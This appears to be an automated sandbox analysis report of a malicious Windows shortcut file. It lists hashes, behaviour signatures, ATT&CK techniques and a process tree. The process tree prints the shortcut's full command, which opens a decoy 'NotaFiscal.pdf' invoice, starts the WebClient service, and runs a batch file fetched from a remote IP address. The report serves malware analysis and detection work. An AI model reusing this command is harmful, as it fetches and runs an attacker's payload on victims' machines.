f33fcd218039e2e9cd50d0342286dcd41268a8b2c6adae6877eb7591c77e7747

Analysis

max time kernel
120s
max time network
125s
platform
windows10-2004_x64
resource
win10v2004-20240508-en
resource tags

arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
submitted
09/05/2024, 08:32

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

f33fcd218039e2e9cd50d0342286dcd41268a8b2c6adae6877eb7591c77e7747.lnk
Size

2KB
MD5

7b5db2de0a2d91a0e6f83080e8dd0d6e
SHA1

5a370fa094efe972929d1e6dc604162821da698b
SHA256

f33fcd218039e2e9cd50d0342286dcd41268a8b2c6adae6877eb7591c77e7747
SHA512

2f816236825717d5aa942898f8320e73883364d76a2fd36c935f9b21f7c034f5176ed2365ff9157e7ccc4e7bbf1b1e1af40c0811619fe481b28fcf0c07f9080c

Score

7^/10

Malware Config

Signatures

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation	cmd.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation	cmd.exe

Launches sc.exe 1 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
4788	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	AcroRd32.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	AcroRd32.exe

Modifies Internet Explorer settings 1 TTPs 1 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION	AcroRd32.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings	cmd.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
1520	PING.EXE

Suspicious use of SetWindowsHookEx 4 IoCs

pid	Process
576	AcroRd32.exe
576	AcroRd32.exe
576	AcroRd32.exe
576	AcroRd32.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4628 wrote to memory of 4136	4628	cmd.exe	84
PID 4628 wrote to memory of 4136	4628	cmd.exe	84
PID 4136 wrote to memory of 576	4136	cmd.exe	85
PID 4136 wrote to memory of 576	4136	cmd.exe	85
PID 4136 wrote to memory of 576	4136	cmd.exe	85
PID 4136 wrote to memory of 4788	4136	cmd.exe	87
PID 4136 wrote to memory of 4788	4136	cmd.exe	87
PID 4136 wrote to memory of 1520	4136	cmd.exe	88
PID 4136 wrote to memory of 1520	4136	cmd.exe	88
PID 576 wrote to memory of 3228	576	AcroRd32.exe	91
PID 576 wrote to memory of 3228	576	AcroRd32.exe	91
PID 576 wrote to memory of 3228	576	AcroRd32.exe	91
PID 3228 wrote to memory of 3888	3228	RdrCEF.exe	92
PID 3228 wrote to memory of 3888	3228	RdrCEF.exe	92
PID 3228 wrote to memory of 3888	3228	RdrCEF.exe	92
PID 3228 wrote to memory of 3888	3228	RdrCEF.exe	92
PID 3228 wrote to memory of 3888	3228	RdrCEF.exe	92
PID 3228 wrote to memory of 3888	3228	RdrCEF.exe	92
PID 3228 wrote to memory of 3888	3228	RdrCEF.exe	92
PID 3228 wrote to memory of 3888	3228	RdrCEF.exe	92
PID 3228 wrote to memory of 3888	3228	RdrCEF.exe	92
PID 3228 wrote to memory of 3888	3228	RdrCEF.exe	92
PID 3228 wrote to memory of 3888	3228	RdrCEF.exe	92
PID 3228 wrote to memory of 3888	3228	RdrCEF.exe	92
PID 3228 wrote to memory of 3888	3228	RdrCEF.exe	92
PID 3228 wrote to memory of 3888	3228	RdrCEF.exe	92
PID 3228 wrote to memory of 3888	3228	RdrCEF.exe	92
PID 3228 wrote to memory of 3888	3228	RdrCEF.exe	92
PID 3228 wrote to memory of 3888	3228	RdrCEF.exe	92
PID 3228 wrote to memory of 3888	3228	RdrCEF.exe	92
PID 3228 wrote to memory of 3888	3228	RdrCEF.exe	92
PID 3228 wrote to memory of 3888	3228	RdrCEF.exe	92
PID 3228 wrote to memory of 3888	3228	RdrCEF.exe	92
PID 3228 wrote to memory of 3888	3228	RdrCEF.exe	92
PID 3228 wrote to memory of 3888	3228	RdrCEF.exe	92
PID 3228 wrote to memory of 3888	3228	RdrCEF.exe	92
PID 3228 wrote to memory of 3888	3228	RdrCEF.exe	92
PID 3228 wrote to memory of 3888	3228	RdrCEF.exe	92
PID 3228 wrote to memory of 3888	3228	RdrCEF.exe	92
PID 3228 wrote to memory of 3888	3228	RdrCEF.exe	92
PID 3228 wrote to memory of 3888	3228	RdrCEF.exe	92
PID 3228 wrote to memory of 3888	3228	RdrCEF.exe	92
PID 3228 wrote to memory of 3888	3228	RdrCEF.exe	92
PID 3228 wrote to memory of 3888	3228	RdrCEF.exe	92
PID 3228 wrote to memory of 3888	3228	RdrCEF.exe	92
PID 3228 wrote to memory of 3888	3228	RdrCEF.exe	92
PID 3228 wrote to memory of 3888	3228	RdrCEF.exe	92
PID 3228 wrote to memory of 3888	3228	RdrCEF.exe	92
PID 3228 wrote to memory of 3888	3228	RdrCEF.exe	92
PID 3228 wrote to memory of 3888	3228	RdrCEF.exe	92
PID 3228 wrote to memory of 3888	3228	RdrCEF.exe	92
PID 3228 wrote to memory of 3888	3228	RdrCEF.exe	92
PID 3228 wrote to memory of 3888	3228	RdrCEF.exe	92
PID 3228 wrote to memory of 856	3228	RdrCEF.exe	93
PID 3228 wrote to memory of 856	3228	RdrCEF.exe	93
PID 3228 wrote to memory of 856	3228	RdrCEF.exe	93
PID 3228 wrote to memory of 856	3228	RdrCEF.exe	93
PID 3228 wrote to memory of 856	3228	RdrCEF.exe	93
PID 3228 wrote to memory of 856	3228	RdrCEF.exe	93
PID 3228 wrote to memory of 856	3228	RdrCEF.exe	93
PID 3228 wrote to memory of 856	3228	RdrCEF.exe	93
PID 3228 wrote to memory of 856	3228	RdrCEF.exe	93
PID 3228 wrote to memory of 856	3228	RdrCEF.exe	93
PID 3228 wrote to memory of 856	3228	RdrCEF.exe	93

C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\f33fcd218039e2e9cd50d0342286dcd41268a8b2c6adae6877eb7591c77e7747.lnk
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4628
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" "/min /c "echo Visualizacao indisponivel > C:\Users\Admin\\downloads\\NotaFiscal.pdf && start C:\Users\Admin\\downloads\\NotaFiscal.pdf && start sc start webclient && ping localhost -n 7 && start /min cmd.exe /c \\38.180.136.158@80\iZFhhtoO\Offer202447.bat"
  2⤵
  - Checks computer location settings
  - Modifies registry class
  - Suspicious use of WriteProcessMemory
  PID:4136
- - C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
    "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\Admin\Downloads\NotaFiscal.pdf"
    3⤵
    - Checks processor information in registry
    - Modifies Internet Explorer settings
    - Suspicious use of SetWindowsHookEx
    - Suspicious use of WriteProcessMemory
    PID:576
  - - C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
      "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043
      4⤵
      Suspicious use of WriteProcessMemory
      PID:3228
    - - C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
        
        "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=6BA68E202FED590F4D0ADAD4B998D831 --mojo-platform-channel-handle=1724 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
        5⤵
        
        PID:3888
    - - C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
        
        "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=960C94DA004A486474BC592E2E122CF0 --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=960C94DA004A486474BC592E2E122CF0 --renderer-client-id=2 --mojo-platform-channel-handle=1732 --allow-no-sandbox-job /prefetch:1
        5⤵
        
        PID:856
    - - C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
        
        "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=1ED06CB5CD063518D0580C70C6F87E90 --mojo-platform-channel-handle=2292 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
        5⤵
        
        PID:536
    - - C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
        
        "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=5BDCF55CB60C80E7169F5DEBF87724C7 --mojo-platform-channel-handle=1788 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
        5⤵
        
        PID:4388
    - - C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
        
        "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=D28DE57619EE3673C642454ACFBEE476 --mojo-platform-channel-handle=2376 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
        5⤵
        
        PID:4908
- - C:\Windows\system32\sc.exe
    sc start webclient
    3⤵
    - Launches sc.exe
    PID:4788
- - C:\Windows\system32\PING.EXE
    ping localhost -n 7
    3⤵
    - Runs ping.exe
    PID:1520
- - C:\Windows\system32\cmd.exe
    cmd.exe /c \\38.180.136.158@80\iZFhhtoO\Offer202447.bat
    3⤵
    PID:1668

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:4396

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages

Filesize
64KB

MD5
682c99f22249cf9012dda1ea443a4d46

SHA1
f60629143f3e423d3c29bafb2b8d0d82ab946cef

SHA256
15c3ae29dc7da732d3a1c27b1c62b721825cd1271a8f080f5e1a36936e4fb700

SHA512
744132df4e4984d606560d0d48097dc4804013cd54c390fa06d0d18125686144dd7b9bab36d1089038b08363174589bed94418354059540bd7e631a59ff36d7e

Download Submit
C:\Users\Admin\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages

Filesize
64KB

MD5
a11c01620326c7d5b7f69d619bed1e93

SHA1
37febab24fb31c2ac316d2727ddf0128fd39cc2b

SHA256
02134136b79171c0a67664acd59afbc038903045297abae07fb16e6d41443b33

SHA512
1846121e3a227908d0b86226ace08d54674840d70f9596dfd394725db9626b3a62a7c52e5e37fa4b3fa019ecca7c23a2439cdc751564968f366fc7b29acd796b

Download Submit
C:\Users\Admin\Downloads\NotaFiscal.pdf

Filesize
29B

MD5
823a9caa296579d6a40cd5195d969727

SHA1
5592813787ecff9133229439498d624339c07ece

SHA256
60b827294f341e5f200c6512b976cac056a592ac1abdd932af8abff314b7bb0e

SHA512
77ec77b000d5d230071a101954968f585ceed9e589652af38411d14b594a7432b610ef9c8b7d1c9256a5e6fe5eeda53d017a4c6d840c987b884b9cca17d7e0bc

Download Submit

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads